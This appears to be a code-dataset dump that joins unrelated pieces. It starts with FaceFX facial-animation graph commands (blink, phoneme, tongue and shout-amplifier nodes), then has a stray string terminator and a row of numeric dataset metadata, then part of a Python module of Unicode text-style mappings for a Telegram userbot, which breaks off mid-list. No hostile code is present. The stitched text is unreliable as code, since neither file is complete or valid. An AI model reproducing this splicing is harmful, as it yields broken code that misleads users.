graph -addnode -nodetype "FxCombinerNode" -name "mocap_blink_suppressor" -nodex 10179 -nodey -5836;
graph -link -from "mocap_blink_suppressor" -to "Blink_L" -linkfn "corrective";
graph -link -from "mocap_blink_suppressor" -to "Blink_R" -linkfn "corrective";
graph -link -from "Blink" -to "mocap_blink_suppressor" -linkfn "corrective";
graph -link -from "facefx_to_mocap_depressor" -to "mocap_blink_suppressor" -linkfn "linear";
# Restores delta P while playing lipsync
graph -addnode -nodetype "FxCombinerNode" -name "phoneme_P_delta_facefx_call" -nodex 11907 -nodey -1499;
graph -link -from "phoneme_P_delta_facefx_call" -to "phoneme_P_delta_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "phoneme_P_delta_facefx_call" -linkfn "linear";
graph -unlink -from "mocap_emotions_depressor" -to "phoneme_P_delta_elements";
graph -editlink -from "phoneme_P_delta" -to "phoneme_P_delta_elements" -linkfn "linear" -linkfnparams "m=1.0|b=0.000000";
graph -link -from "P" -to "phoneme_P_delta_facefx_call" -linkfn "corrective";
# Not batched
# Reduce Y phoneme for Anna-like setup (women)
graph -editlink -from "phoneme_Y" -to "phoneme_Y_up_elements" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "phoneme_Y" -to "phoneme_Y_down_elements" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "phoneme_Y_delta" -to "phoneme_Y_delta_up_elements" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "phoneme_Y_delta" -to "phoneme_Y_delta_down_elements" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
# restores tongue movement
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Down";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_In";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Narrow";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Pressed_Upwards";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Rolled_Down";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Rolled_Up";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Up";
graph -unlink -from "mocap_low_face_depressor" -to "Tongue_Wide";
# Connects Stress as low lip down trigger
graph -unlink -from "Stress" -to "Stress_inv";
graph -unlink -from "Rate of Speech Scale_inv" -to "low_lip_down_call";
graph -link -from "Stress" -to "low_lip_down" -linkfn "linear";
graph -link -from "Rate of Speech Scale_inv" -to "Stress" -linkfn "corrective";
# Added suppression for low lip down if the mouth opens wide
graph -link -from "jaw_open_general" -to "low_lip_down" -linkfn "corrective";
# Removed node that triggered low lip down somehow
graph -removenode -name "low_lip_down_call";
# Added speech amplifier for shout
graph -addnode -nodetype "FxCombinerNode" -name "speech_amplifier_upper" -nodex 9052 -nodey -10703 -inputop "Multiply Inputs" -max 2.000000;
graph -addnode -nodetype "FxCombinerNode" -name "speech_amplifier_depressor" -nodex 9052 -nodey -10703;
graph -addnode -nodetype "FxCombinerNode" -name "speech_amplifier_low" -nodex 9052 -nodey -10703 -inputop "Multiply Inputs";
graph -addnode -nodetype "FxCombinerNode" -name "wide_pose" -nodex 9052 -nodey -10703;
graph -addnode -nodetype "FxCombinerNode" -name "jaw_amplifier" -nodex 9052 -nodey -10703 -max 2.000000;
graph -addnode -nodetype "FxCombinerNode" -name "amplifier_inverted" -nodex 9052 -nodey -10703;
graph -addnode -nodetype "FxCombinerNode" -name "speech_amplifier" -nodex 9052 -nodey -10703;
graph -addnode -nodetype "FxCombinerNode" -name "stress_amplifier" -nodex 9052 -nodey -10703;
// speech_amplifier_upper
// out
graph -link -from "speech_amplifier_upper" -to "anger_up_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -link -from "speech_amplifier_upper" -to "anger_eye_r_elements" -linkfn "linear" -linkfnparams "m=0.25|b=0.000000";
graph -link -from "speech_amplifier_upper" -to "anger_eye_l_elements" -linkfn "linear" -linkfnparams "m=0.25|b=0.000000";
graph -link -from "speech_amplifier_upper" -to "speech_amplifier_depressor" -linkfn "corrective";
// in
graph -link -from "Stress" -to "speech_amplifier_upper" -linkfn "linear";
graph -link -from "eye_emotions_depressor" -to "speech_amplifier_upper" -linkfn "corrective";
graph -link -from "speech_amplifier" -to "speech_amplifier_upper" -linkfn "linear";
// speech_amplifier_low
// out
graph -link -from "speech_amplifier_low" -to "anger_lip_L_down" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "speech_amplifier_low" -to "anger_lip_R_down" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "speech_amplifier_low" -to "wide_pose" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -link -from "speech_amplifier_low" -to "Nose_Up_L" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
graph -link -from "speech_amplifier_low" -to "Nose_Up_R" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
graph -link -from "speech_amplifier_low" -to "disgust_lip_L_up" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
graph -link -from "speech_amplifier_low" -to "disgust_lip_R_up" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
// in
graph -link -from "Stress" -to "speech_amplifier_low" -linkfn "linear";
graph -link -from "speech_amplifier" -to "speech_amplifier_low" -linkfn "linear";
graph -link -from "P" -to "speech_amplifier_low" -linkfn "corrective";
graph -link -from "U" -to "speech_amplifier_low" -linkfn "corrective" -linkfnparams "Correction Factor=0.5"
// wide_pose
// out
graph -link -from "wide_pose" -to "wide_pose_nose_R" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_nose_L" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_lip_R_up" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_lip_R_down" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_lip_L_up" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_lip_L_down" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_jaw_R" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_jaw_L" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_cheek_R" -linkfn "linear";
graph -link -from "wide_pose" -to "wide_pose_cheek_L" -linkfn "linear";
// in
graph -link -from "stress_amplifier" -to "wide_pose" -linkfn "linear";
graph -link -from "P" -to "wide_pose" -linkfn "corrective";
graph -link -from "speech_amplifier_low" -to "wide_pose" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
// jaw_amplifier
// out
graph -link -from "jaw_amplifier" -to "jaw_open_general" -linkfn "linear";
graph -link -from "jaw_amplifier" -to "up_lip_up" -linkfn "linear";
// in
graph -link -from "amplifier_inverted" -to "jaw_amplifier" -linkfn "linear" -linkfnparams "m=-1|b=1";
// speech_amplifier
// out
graph -link -from "speech_amplifier" -to "stress_amplifier" -linkfn "corrective";
graph -link -from "speech_amplifier" -to "speech_amplifier_low" -linkfn "linear";
graph -link -from "speech_amplifier" -to "speech_amplifier_upper" -linkfn "linear";
// stress_amplifier
// out
graph -link -from "stress_amplifier" -to "wide_pose" -linkfn "linear";
graph -link -from "stress_amplifier" -to "Lip_Up_Open_L" -linkfn "linear";
graph -link -from "stress_amplifier" -to "Lip_Up_Open_R" -linkfn "linear";
graph -link -from "stress_amplifier" -to "Lip_Up_Pinch_L" -linkfn "linear";
graph -link -from "stress_amplifier" -to "Lip_Up_Pinch_R" -linkfn "linear";
graph -link -from "stress_amplifier" -to "up_lip_up" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "stress_amplifier" -to "anger_lip_L_up" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -link -from "stress_amplifier" -to "anger_lip_R_up" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -link -from "stress_amplifier" -to "Nose_Up_L" -linkfn "linear" -linkfnparams "m=0.2|b=0.000000";
graph -link -from "stress_amplifier" -to "Nose_Up_R" -linkfn "linear" -linkfnparams "m=0.2|b=0.000000";
// in
graph -link -from "Stress" -to "stress_amplifier" -linkfn "linear";
graph -link -from "speech_amplifier" -to "stress_amplifier" -linkfn "corrective";
// speech_amplifier_depressor
// out
graph -link -from "speech_amplifier_depressor" -to "anger_up_elements" -linkfn "corrective";
graph -link -from "speech_amplifier_depressor" -to "anger_eye_l_elements" -linkfn "corrective";
graph -link -from "speech_amplifier_depressor" -to "anger_eye_r_elements" -linkfn "corrective";
// in
graph -link -from "speech_amplifier_upper" -to "speech_amplifier_depressor" -linkfn "corrective";
graph -link -from "facefx_to_mocap_depressor" -to "speech_amplifier_depressor" -linkfn "linear";
// unlink
graph -unlink -from "mocap_emotions_depressor" -to "anger_up_elements";
graph -unlink -from "mocap_emotions_depressor" -to "anger_eye_r_elements";
graph -unlink -from "mocap_emotions_depressor" -to "anger_eye_l_elements";
# Restores wonder brows, decreases eyes open
graph -editlink -from "surprise_up_suppressor" -to "surprise_up" -linkfn "corrective" -linkfnparams "Correction Factor=0.000000";
graph -editlink -from "Wonder" -to "surprise_eye_r" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "Wonder" -to "surprise_eye_l" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
'''
| 66.428295 | 146 | 0.73224 | 4,853 | 34,277 | 4.909128 | 0.071502 | 0.080465 | 0.116227 | 0.079332 | 0.840455 | 0.811954 | 0.78358 | 0.738121 | 0.706682 | 0.666093 | 0 | 0.024135 | 0.139335 | 34,277 | 515 | 147 | 66.557282 | 0.783431 | 0.008811 | 0 | 0.071429 | 0 | 0.030612 | 0.219767 | 0.050996 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.05102 | null | null | 0.081633 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cc0a9d8cde4f6ed505ccb1d0e6065118198b8e88 | 26,139 | py | Python | userbot/helpers/fonts.py | Doom098/userbot | 11f0225a75241ab9492b1c435414c77de287b8a6 | ["MIT"] | 25 | 2021-06-01T04:59:13.000Z | 2022-03-01T05:31:13.000Z | userbot/helpers/fonts.py | Doom098/userbot | 11f0225a75241ab9492b1c435414c77de287b8a6 | ["MIT"] | 15 | 2019-11-07T07:53:56.000Z | 2022-01-23T09:21:17.000Z | userbot/helpers/fonts.py | Doom098/userbot | 11f0225a75241ab9492b1c435414c77de287b8a6 | ["MIT"] | 78 | 2020-12-13T17:52:51.000Z | 2022-03-24T03:43:09.000Z |
normaltext = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
smallcapsfont = "ᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘǫʀsᴛᴜᴠᴡxʏᴢᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘǫʀsᴛᴜᴠᴡxʏᴢ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
superscriptfont = "ᴬᴮᶜᴰᴱᶠᴳᴴᴵᴶᴷᴸᴹᴺᴼᴾᵠᴿˢᵀᵁⱽᵂˣʸᶻᵃᵇᶜᵈᵉᶠᵍʰᶦʲᵏˡᵐⁿᵒᵖᵠʳˢᵗᵘᵛʷˣʸᶻ¹²³⁴⁵⁶⁷⁸⁹⁰\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
subscriptfont = "ₐBCDₑFGₕᵢⱼₖₗₘₙₒₚQᵣₛₜᵤᵥWₓYZₐᵦ𝒸𝒹ₑ𝒻𝓰ₕᵢⱼₖₗₘₙₒₚᵩᵣₛₜᵤᵥ𝓌ₓᵧ𝓏₁₂₃₄₅₆₇₈₉₀\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
bubblesfont = "ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
bubblesblackfont = "🅐🅑🅒🅓🅔🅕🅖🅗🅘🅙🅚🅛🅜🅝🅞🅟🅠🅡🅢🅣🅤🅥🅦🅧🅨🅩🅐🅑🅒🅓🅔🅕🅖🅗🅘🅙🅚🅛🅜🅝🅞🅟🅠🅡🅢🅣🅤🅥🅦🅧🅨🅩1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
smothtextfont = "ᗩᗷᑕᗞᗴᖴᏀᕼᏆᒍᏦᏞᗰᑎᝪᑭᑫᖇᔑᎢᑌᐯᗯ᙭ᎩᏃᗩᗷᑕᗞᗴᖴᏀᕼᏆᒍᏦᏞᗰᑎᝪᑭᑫᖇᔑᎢᑌᐯᗯ᙭ᎩᏃ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
egyptfontfont = "ค๒ς๔єŦﻮђเןкl๓ภ๏קợгรtยשฬץאzค๒ς๔єŦﻮђเןкl๓ภ๏קợгรtยשฬץאz1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
hwslfont = "𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
nightmarefont = "𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
ghostfontfont = "𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
hwcapitalfont = "𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩𝓐𝓑𝓒𝓓𝓔𝓕𝓖𝓗𝓘𝓙𝓚𝓛𝓜𝓝𝓞𝓟𝓠𝓡𝓢𝓣𝓤𝓥𝓦𝓧𝓨𝓩1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
tantextfont = "ᎯᏰᏣᎴᏋᎴᎶᏂiᏠᏦlmᏁᏫᎵᏄᖇᎦᎿᏌᏉᏯメᎩᏃᎯᏰᏣᎴᏋᎴᎶᏂiᏠᏦlmᏁᏫᎵᏄᖇᎦᎿᏌᏉᏯメᎩᏃ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
littleboxtextfont = "🄰🄱🄲🄳🄴🄵🄶🄷🄸🄹🄺🄻🄼🄽🄾🄿🅀🅁🅂🅃🅄🅅🅆🅇🅈🅉🄰🄱🄲🄳🄴🄵🄶🄷🄸🄹🄺🄻🄼🄽🄾🄿🅀🅁🅂🅃🅄🅅🅆🅇🅈🅉1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
doubletextfont = "ᎯℬℂⅅℰℱᎶℋℐᎫᏦℒℳℕᎾℙℚℛЅᏆUᏉᏇXᎽℤᎯℬℂⅅℰℱᎶℋℐᎫᏦℒℳℕᎾℙℚℛЅᏆUᏉᏇXᎽℤ1234567890\"'#$%&()*+,-./:;<=>?@[\\]^_`{|}~"
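# Usage sketch (hypothetical helper, not part of the original module): each of
# the *font strings above restyles `normaltext` character for character, so a
# string can be converted by mapping characters positionally. Assumes the two
# strings stay parallel; unknown characters pass through unchanged.
def restyle(text, font=smallcapsfont):
    table = dict(zip(normaltext, font))  # per-character mapping
    return ''.join(table.get(ch, ch) for ch in text)
# e.g. restyle("Hello") -> 'ʜᴇʟʟᴏ'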
upsidefont = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
"q",
"r",
"s",
"t",
"u",
"v",
"w",
"x",
"y",
"z",
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"O",
"P",
"Q",
"R",
"S",
"T",
"U",
"V",
"W",
"X",
"Y",
"Z",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"_",
"'",
",",
"\\",
"/",
"!",
"?",
]
downsidefont = [
"ɐ",
"q",
"ɔ",
"p",
"ə",
"ɟ",
"ɓ",
"ɥ",
"ı",
"ɾ",
"ʞ",
"l",
"ɯ",
"u",
"o",
"p",
"q",
"ɹ",
"s",
"ʇ",
"n",
"ʌ",
"ʍ",
"x",
"ʎ",
"z",
"∀",
"B",
"Ↄ",
"◖",
"Ǝ",
"Ⅎ",
"⅁",
"H",
"I",
"ſ",
"K",
"⅂",
"W",
"ᴎ",
"O",
"Ԁ",
"Ό",
"ᴚ",
"S",
"⊥",
"∩",
"ᴧ",
"M",
"X",
"⅄",
"Z",
"0",
"1",
"ᄅ",
"Ɛ",
"ᔭ",
"5",
"9",
"Ɫ",
"8",
"6",
"¯",
",",
"'",
"/",
"\\",
"¡",
"¿",
]
ancientfont = [
"ꍏ",
"ꌃ",
"ꉓ",
"ꀸ",
"ꍟ",
"ꎇ",
"ꁅ",
"ꃅ",
"ꀤ",
"ꀭ",
"ꀘ",
"꒒",
"ꎭ",
"ꈤ",
"ꂦ",
"ᖘ",
"ꆰ",
"ꋪ",
"ꌗ",
"꓄",
"ꀎ",
"ᐯ",
"ꅏ",
"ꊼ",
"ꌩ",
"ꁴ",
"ꍏ",
"ꌃ",
"ꉓ",
"ꀸ",
"ꍟ",
"ꎇ",
"ꁅ",
"ꃅ",
"ꀤ",
"ꀭ",
"ꀘ",
"꒒",
"ꎭ",
"ꈤ",
"ꂦ",
"ᖘ",
"ꆰ",
"ꋪ",
"ꌗ",
"꓄",
"ꀎ",
"ᐯ",
"ꅏ",
"ꊼ",
"ꌩ",
"ꁴ",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"_",
"'",
",",
"\\",
"/",
"!",
"?",
]
normalfont = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
"q",
"r",
"s",
"t",
"u",
"v",
"w",
"x",
"y",
"z",
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M",
"N",
"O",
"P",
"Q",
"R",
"S",
"T",
"U",
"V",
"W",
"X",
"Y",
"Z",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"_",
"'",
",",
"\\",
"/",
"!",
"?",
]
musicalfont = [
"♬",
"ᖲ",
"¢",
"ᖱ",
"៩",
"⨏",
"❡",
"Ϧ",
"ɨ",
"ɉ",
"ƙ",
"ɭ",
"៣",
"⩎",
"០",
"ᖰ",
"ᖳ",
"Ʀ",
"ន",
"Ƭ",
"⩏",
"⩔",
"Ɯ",
"✗",
"ƴ",
"Ȥ",
"♬",
"ᖲ",
"¢",
"ᖱ",
"៩",
"⨏",
"❡",
"Ϧ",
"ɨ",
"ɉ",
"ƙ",
"ɭ",
"៣",
"⩎",
"០",
"ᖰ",
"ᖳ",
"Ʀ",
"ន",
"Ƭ",
"⩏",
"⩔",
"Ɯ",
"✗",
"ƴ",
"Ȥ",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"_",
"'",
",",
"\\",
"/",
"!",
"?",
]
normiefont = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
"q",
"r",
"s",
"t",
"u",
"v",
"w",
"x",
"y",
"z",
]
weebyfont = [
"卂",
"乃",
"匚",
"刀",
"乇",
"下",
"厶",
"卄",
"工",
"丁",
"长",
"乚",
"从",
"𠘨",
"口",
"尸",
"㔿",
"尺",
"丂",
"丅",
"凵",
"リ",
"山",
"乂",
"丫",
"乙",
]
EMOJIS = [
"😂",
"😂",
"👌",
"💞",
"👍",
"👌",
"💯",
"🎶",
"👀",
"😂",
"👓",
"👏",
"👐",
"🍕",
"💥",
"😩",
"😏",
"😞",
"👀",
"👅",
"😩",
"🤒",
"😳",
"🤯",
"😵",
"🥵",
"🤒",
"😠",
"😪",
"😴",
"🤤",
"👿",
"👽",
"😏",
"😒",
"😣",
"🤔",
"🤨",
"🧐",
"😝",
"🤪",
"🤩",
"☺️",
"😭",
"🥺",
]
ZALG_LIST = [
[
"̖",
" ̗",
" ̘",
" ̙",
" ̜",
" ̝",
" ̞",
" ̟",
" ̠",
" ̤",
" ̥",
" ̦",
" ̩",
" ̪",
" ̫",
" ̬",
" ̭",
" ̮",
" ̯",
" ̰",
" ̱",
" ̲",
" ̳",
" ̹",
" ̺",
" ̻",
" ̼",
" ͅ",
" ͇",
" ͈",
" ͉",
" ͍",
" ͎",
" ͓",
" ͔",
" ͕",
" ͖",
" ͙",
" ͚",
" ",
],
[
" ̍",
" ̎",
" ̄",
" ̅",
" ̿",
" ̑",
" ̆",
" ̐",
" ͒",
" ͗",
" ͑",
" ̇",
" ̈",
" ̊",
" ͂",
" ̓",
" ̈́",
" ͊",
" ͋",
" ͌",
" ̃",
" ̂",
" ̌",
" ͐",
" ́",
" ̋",
" ̏",
" ̽",
" ̉",
" ͣ",
" ͤ",
" ͥ",
" ͦ",
" ͧ",
" ͨ",
" ͩ",
" ͪ",
" ͫ",
" ͬ",
" ͭ",
" ͮ",
" ͯ",
" ̾",
" ͛",
" ͆",
" ̚",
],
[
" ̕",
" ̛",
" ̀",
" ́",
" ͘",
" ̡",
" ̢",
" ̧",
" ̨",
" ̴",
" ̵",
" ̶",
" ͜",
" ͝",
" ͞",
" ͟",
" ͠",
" ͢",
" ̸",
" ̷",
" ͡",
],
]
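# Usage sketch (hypothetical helper, not part of the original module):
# ZALG_LIST holds three groups of combining marks; a basic "zalgo" effect
# appends a few random marks from each group to every character. Entries in
# the source list carry a stray leading space, hence the .strip().
import random

def zalgofy(text, intensity=2):
    out = []
    for ch in text:
        out.append(ch)
        for group in ZALG_LIST:
            out.extend(random.choice(group).strip() for _ in range(intensity))
    return ''.join(out)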
kakashitext = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
"q",
"r",
"s",
"t",
"u",
"v",
"w",
"x",
"y",
"z",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
]
kakashiemoji = [
"\n 💖\n 💖💖\n 💖💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖💖💖💖💖\n 💖💖💖💖💖💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n💖💖 💖💖\n",
"\n💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗\n",
"\n 💛💛💛💛💛💛\n 💛💛💛💛💛💛💛💛\n 💛💛 💛💛\n 💛💛\n💛💛\n💛💛\n 💛💛\n 💛💛 💛💛\n 💛💛💛💛💛💛💛💛\n 💛💛💛💛💛💛\n",
"\n💙💙💙💙💙💙💙\n💙💙💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙💙💙💙💙💙💙\n💙💙💙💙💙💙💙\n",
"\n💟💟💟💟💟💟💟💟\n💟💟💟💟💟💟💟💟\n💟💟\n💟💟\n💟💟💟💟💟💟\n💟💟💟💟💟💟\n💟💟\n💟💟\n💟💟💟💟💟💟💟💟\n💟💟💟💟💟💟💟💟\n",
"\n💚💚💚💚💚💚💚💚\n💚💚💚💚💚💚💚💚\n💚💚\n💚💚\n💚💚💚💚💚💚\n💚💚💚💚💚💚\n💚💚\n💚💚\n💚💚\n💚💚\n",
"\n 💜💜💜💜💜💜\n 💜💜💜💜💜💜💜💜\n 💜💜 💜💜\n 💜💜\n💜💜 💜💜💜💜\n💜💜 💜💜💜💜\n 💜💜 💜💜\n 💜💜 💜💜\n 💜💜💜💜💜💜💜💜\n 💜💜💜💜💜💜\n",
"\n💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n💖💖💖💖💖💖💖💖💖\n💖💖💖💖💖💖💖💖💖\n💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n",
"\n💗💗💗💗💗💗\n💗💗💗💗💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n💗💗💗💗💗💗\n💗💗💗💗💗💗\n",
"\n 💛💛💛💛💛💛\n 💛💛💛💛💛💛\n 💛💛\n 💛💛\n 💛💛\n 💛💛\n💛💛 💛💛\n 💛💛 💛💛\n 💛💛💛💛💛\n 💛💛💛💛\n",
"\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n",
"\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟\n💟💟💟💟💟💟💟💟\n💟💟💟💟💟💟💟💟\n",
"\n💚💚 💚💚\n💚💚💚 💚💚💚\n💚💚💚💚 💚💚💚💚\n💚💚 💚💚 💚💚 💚💚\n💚💚 💚💚💚 💚💚\n💚💚 💚 💚💚\n💚💚 💚💚\n💚💚 💚💚\n💚💚 💚💚\n💚💚 💚💚\n",
"\n💜💜 💜💜\n💜💜💜 💜💜\n💜💜💜💜 💜💜\n💜💜 💜💜 💜💜\n💜💜 💜💜 💜💜\n💜💜 💜💜 💜💜\n💜💜 💜💜 💜💜\n💜💜 💜💜💜💜\n💜💜 💜💜💜\n💜💜 💜💜\n",
"\n 💖💖💖💖💖\n 💖💖💖💖💖💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n💖💖 💖💖\n💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖💖💖💖💖💖\n 💖💖💖💖💖\n",
"\n💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗\n💗💗\n💗💗\n💗💗\n💗💗\n",
"\n 💛💛💛💛💛\n 💛💛💛💛💛💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n💛💛 💛💛\n💛💛 💛💛 💛💛\n 💛💛 💛💛 💛💛\n 💛💛 💛💛\n 💛💛💛💛💛💛💛💛\n 💛💛💛💛💛 💛💛\n",
"\n💙💙💙💙💙💙💙\n💙💙💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙💙💙💙💙💙💙\n💙💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n💙💙 💙💙\n",
"\n 💟💟💟💟💟\n 💟💟💟💟💟💟💟\n 💟💟 💟💟\n💟💟\n 💟💟💟💟💟💟\n 💟💟💟💟💟💟\n 💟💟\n💟💟 💟💟\n 💟💟💟💟💟💟💟\n 💟💟💟💟💟\n",
"\n💚💚💚💚💚💚💚💚\n💚💚💚💚💚💚💚💚\n 💚💚\n 💚💚\n 💚💚\n 💚💚\n 💚💚\n 💚💚\n 💚💚\n",
"\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n💜💜 💜💜\n 💜💜 💜💜\n 💜💜💜💜💜💜\n 💜💜💜💜\n",
"\n💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖💖\n 💖\n",
"\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗 💗💗\n 💗💗 💗💗 💗💗\n 💗💗 💗💗💗 💗💗\n 💗💗 💗💗 💗💗 💗💗\n 💗💗💗💗 💗💗💗💗\n 💗💗💗 💗💗💗\n",
